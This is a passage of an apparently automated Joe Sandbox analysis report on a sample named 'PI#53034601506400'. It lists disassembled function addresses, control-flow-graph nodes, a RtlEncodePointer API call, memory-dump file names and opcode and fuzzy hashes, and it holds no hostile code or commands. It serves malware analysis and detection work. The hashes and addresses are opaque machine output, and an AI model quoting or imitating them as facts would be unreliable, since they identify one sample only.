                                                  Uniqueness Score: -1.00%

                                                  Function 00777C09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 969 777c09-777c58 call 777a40 call 777a98 974 777c5e 969->974 975 777c5a-777c5c 969->975 976 777c63-777c6b 974->976 975->976 977 777cc7-777cd9 976->977 978 777c6d-777c9e RtlEncodePointer 976->978 980 777ca7-777cbd 978->980 981 777ca0-777ca6 978->981 980->977 981->980
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00777C8D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID:
                                                  • API String ID: 2118026453-0
                                                  • Opcode ID: bde5c48a0921d5063fda1feabaf76282c70e6f090f2dcdbb4fdb2602c1a1e0d6
                                                  • Instruction ID: c2a90f9abb569f3b2ed012dc48b34a9f1f262a649354c6e046710cdeb42a05b7
                                                  • Opcode Fuzzy Hash: bde5c48a0921d5063fda1feabaf76282c70e6f090f2dcdbb4fdb2602c1a1e0d6
                                                  • Instruction Fuzzy Hash: AE21BB748043898FCB15CFA8D1497DABFF8FB09314F118869D449A7602C7799949CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00777957 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 983 777957-7779aa 986 7779b0 983->986 987 7779ac-7779ae 983->987 988 7779b5-7779c0 986->988 987->988 989 7779c2-7779f3 RtlEncodePointer 988->989 990 777a21-777a2e 988->990 992 7779f5-7779fb 989->992 993 7779fc-777a1c 989->993 992->993 993->990
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 007779E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID:
                                                  • API String ID: 2118026453-0
                                                  • Opcode ID: 8b33e674f460d44c973df0efeb7e1971ef64fbe7a44f8175f9187afe5ac4acec
                                                  • Instruction ID: 47c8465b460214f48c476248a19f6bdbd24f6de4880e37eb3319a0b8bd1bbf49
                                                  • Opcode Fuzzy Hash: 8b33e674f460d44c973df0efeb7e1971ef64fbe7a44f8175f9187afe5ac4acec
                                                  • Instruction Fuzzy Hash: 372188B19003458FCF60CFA8C64979EBBF4EB4A314F10886AD409E3700C738A809CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00777968 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 995 777968-7779aa 998 7779b0 995->998 999 7779ac-7779ae 995->999 1000 7779b5-7779c0 998->1000 999->1000 1001 7779c2-7779f3 RtlEncodePointer 1000->1001 1002 777a21-777a2e 1000->1002 1004 7779f5-7779fb 1001->1004 1005 7779fc-777a1c 1001->1005 1004->1005 1005->1002
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 007779E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID:
                                                  • API String ID: 2118026453-0
                                                  • Opcode ID: e81421511d5fead489d780ff30d290f2d66a84b9a28f2b505880b86857511c20
                                                  • Instruction ID: 8babbe9e1a5a26ae26820feafce701905f8a051a21e537574b657054cbf728be
                                                  • Opcode Fuzzy Hash: e81421511d5fead489d780ff30d290f2d66a84b9a28f2b505880b86857511c20
                                                  • Instruction Fuzzy Hash: 90116AB19013098FDF50CFA9C54979EBBF4FB4A354F108429D409A3700C779A948CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0072D174 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326297332.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72d000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c9756f3ed31ec8d9db9f8630d625157f236fa31e9bba5049e042802569a895cb
                                                  • Instruction ID: 831b5383cd2f7bc8cc9e2022c3c3bf6e81ddfc1660657087a280c1d9821bdefc
                                                  • Opcode Fuzzy Hash: c9756f3ed31ec8d9db9f8630d625157f236fa31e9bba5049e042802569a895cb
                                                  • Instruction Fuzzy Hash: 732126B1504204EFDB15CF60E9C8B26BBA5FB88314F24C9A9E8094B746C33ADC56CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0072D32C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326297332.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72d000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 71417f1db7437d459753c0eb3f997d01ccbf02fc48efe8788b7dae8a6caf91be
                                                  • Instruction ID: 4a79fae321a22d43d21dae2c2b092936fcd244483708a6688f9884edab23cf1c
                                                  • Opcode Fuzzy Hash: 71417f1db7437d459753c0eb3f997d01ccbf02fc48efe8788b7dae8a6caf91be
                                                  • Instruction Fuzzy Hash: 9A21F575504244DFDB14DF10E9C4B16BBA5FB88314F24C969E8494B746C33ADC46CA62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0072D327 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326297332.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72d000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61856b6ff38b53652fb43e72ebe0fd453e6ac8daa1939b7cb2f24f50dfbc4e7c
                                                  • Instruction ID: 9e6cdb6769cad01fd959705c420cde53403032b33af8b50088786dea4d2b5519
                                                  • Opcode Fuzzy Hash: 61856b6ff38b53652fb43e72ebe0fd453e6ac8daa1939b7cb2f24f50dfbc4e7c
                                                  • Instruction Fuzzy Hash: 5C119D75504280DFCB15CF14E5D4B15BBB1FB84324F28C6A9D8494B656C33AD84ACB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0072D16F Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326297332.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72d000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61856b6ff38b53652fb43e72ebe0fd453e6ac8daa1939b7cb2f24f50dfbc4e7c
                                                  • Instruction ID: 134f38ca9fb786e6d4646478e4ac4088644b1994f910b3848702912c8c75b883
                                                  • Opcode Fuzzy Hash: 61856b6ff38b53652fb43e72ebe0fd453e6ac8daa1939b7cb2f24f50dfbc4e7c
                                                  • Instruction Fuzzy Hash: 57119D75504280DFCB12CF50E5C4B15BBB1FB89324F28C6A9DC494B656C33AD84ACB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%